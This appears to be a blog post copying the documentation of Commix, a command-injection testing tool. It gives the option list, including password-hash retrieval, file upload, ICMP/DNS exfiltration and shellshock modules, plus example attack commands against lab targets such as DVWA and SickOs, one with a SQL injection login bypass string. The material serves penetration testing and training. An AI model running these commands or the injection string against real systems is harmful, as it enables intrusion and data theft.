Commix - Automated Command Injection and Exploitation Tool

Commix - Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.


  • Python 2.6.x or 2.7.x
  • Linux/ Mac OS X/ Windows (experimental)


Download commix by cloning the Git repository:
git clone commix
Commix comes packaged on the official repositories of the following Linux distributions so you can use the package manager to install it!

Commix also comes as a plugin, on the following penetration testing frameworks:
  • TrustedSec's Penetration Testers Framework (PTF)
  • OWASP Offensive Web Testing Framework (OWTF)
  • CTF-Tools
  • PentestBox
  • PenBox
  • Katoolin
  • Aptive's Penetration Testing tools
  • Homebrew Tap - Pen Test Tools


  python [option(s)]

  -h, --help            Show help and exit.

    These options relate to general matters.

    -v VERBOSE          Verbosity level (0-4, Default: 0).

    --install           Install 'commix' to your system.

    --version           Show version number and exit.

    --update            Check for updates (apply if any) and exit.

    --output-dir=OUT..  Set custom output directory path.

    -s SESSION_FILE     Load session from a stored (.sqlite) file.

    --flush-session     Flush session files for current target.

    --ignore-session    Ignore results stored in session file.

    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.

    --batch             Never ask for user input, use the default behaviour.

    --charset=CHARSET   Force character encoding used for data retrieval.

    --check-internet    Check internet connection before assessing the target.

    This options has to be provided, to define the target URL.

    -u URL, --url=URL   Target URL.

    --url-reload        Reload target URL after command execution.

    -l LOGFILE          Parse target from HTTP proxy log file.

    -m BULKFILE         Scan multiple targets given in a textual file.

    -r REQUESTFILE      Load HTTP request from a file.

    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,

                        Default: 0).

    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.

    These options can be used to specify how to connect to the target URL.

    -d DATA, --data=..  Data string to be sent through POST.

    --host=HOST         HTTP Host header.

    --referer=REFERER   HTTP Referer header.

    --user-agent=AGENT  HTTP User-Agent header.

    --random-agent      Use a randomly selected HTTP User-Agent header.

    --param-del=PDEL    Set character for splitting parameter values.

    --cookie=COOKIE     HTTP Cookie header.

    --cookie-del=CDEL   Set character for splitting cookie values.

    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For:').

    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

    --proxy=PROXY       Use a HTTP proxy (e.g. '').

    --tor               Use the Tor network.

    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).

    --tor-check         Check to see if Tor is used properly.

    --auth-url=AUTH_..  Login panel URL.

    --auth-data=AUTH..  Login parameters and data.

    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').

    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').

    --ignore-401        Ignore HTTP error 401 (Unauthorized).

    --force-ssl         Force usage of SSL/HTTPS.

    --ignore-redirects  Ignore redirection attempts.

    --retries=RETRIES   Retries when the connection timeouts (Default: 3).

    These options can be used to enumerate the target host.

    --all               Retrieve everything.

    --current-user      Retrieve current user name.

    --hostname          Retrieve current hostname.

    --is-root           Check if the current user have root privileges.

    --is-admin          Check if the current user have admin privileges.

    --sys-info          Retrieve system information.

    --users             Retrieve system users.

    --passwords         Retrieve system users password hashes.

    --privileges        Retrieve system users privileges.

    --ps-version        Retrieve PowerShell's version number.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.

    --file-write=FIL..  Write to a file on the target host.

    --file-upload=FI..  Upload a file on the target host.

    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

    These options can be used increase the detection and/or injection


    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.

                        (e.g. 'ip_src=,ip_dst=').

    --dns-server=DNS..  The 'DNS exfiltration' injection module.

                        (Domain name used for DNS exfiltration attack).

    --shellshock        The 'shellshock' injection module.

    These options can be used to specify which parameters to inject and to

    provide custom injection payloads.

    -p TEST_PARAMETER   Testable parameter(s).

    --skip=SKIP_PARA..  Skip testing for given parameter(s).

    --suffix=SUFFIX     Injection payload suffix string.

    --prefix=PREFIX     Injection payload prefix string.

    --technique=TECH    Specify injection technique(s) to use.

    --skip-technique..  Specify injection technique(s) to skip.

    --maxlen=MAXLEN     Set the max length of output for time-related

                        injection techniques (Default: 10000 chars).

    --delay=DELAY       Seconds to delay between each HTTP request.

    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).

    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.

    --web-root=WEB_R..  Set the web server document root directory (e.g.


    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').

    --os-cmd=OS_CMD     Execute a single operating system command.

    --os=OS             Force back-end operating system (e.g. 'Windows' or


    --tamper=TAMPER     Use given script(s) for tampering injection data.

    --msf-path=MSF_P..  Set a local path where metasploit is installed.

    --backticks         Use backticks instead of "$()", for commands


    These options can be used to customize the detection phase.

    --level=LEVEL       Level of tests to perform (1-3, Default: 1).

    --skip-calc         Skip the mathematic calculation during the detection


    --skip-empty        Skip testing the parameter(s) with empty value(s).

    --failed-tries=F..  Set a number of failed injection tries, in file-based


    --dependencies      Check for third-party (non-core) dependencies.

    --purge-output      Safely remove all content from output directory.

    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.

    --mobile            Imitate smartphone through HTTP User-Agent header.

    --offline           Work in offline mode.

    --wizard            Simple wizard interface for beginner users.

    --disable-coloring  Disable console output coloring.


root@kali:~/commix# python --url="
vulnerabilities/exec/#" --data="ip=" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
  • Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python --url="
wizard/index.php?type=test" --prefix="'" --suffix="//"
root@kali:~/commix# python --url="
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=" --headers="Accept-Language:fr\nETag:123\n" --proxy=""
  • Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python --url="" 
--data="addr=" --icmp-exfil="ip_src=,ip_dst="
  • Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python --url=""
--data="addr=" --alter-shell="Python"
root@kali:~/commix# python --url="" 
--data="ip=" --auth-url="
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
root@kali:~/commix# python --url="
drawimage.php?pfilez=" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"
root@kali:~/commix# python --url="" 
root@kali:~/commix# python --url="
scenarios/cookie/cookie(blind).php" --cookie="addr="
root@kali:~/commix# python --url="
scenarios/user-agent/ua(blind).php" --level=3
root@kali:~/commix# python --url="
scenarios/referer/referer(classic).php" --level=3
  • Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python --url="*" 
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
root@kali:~/commix# python --url="
scenarios/regular/POST/classic_json.php" --data='{"addr":"","name":"ancst"}'
  • Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python --url="" 
--shellshock --proxy=""

No comments

Powered by Blogger.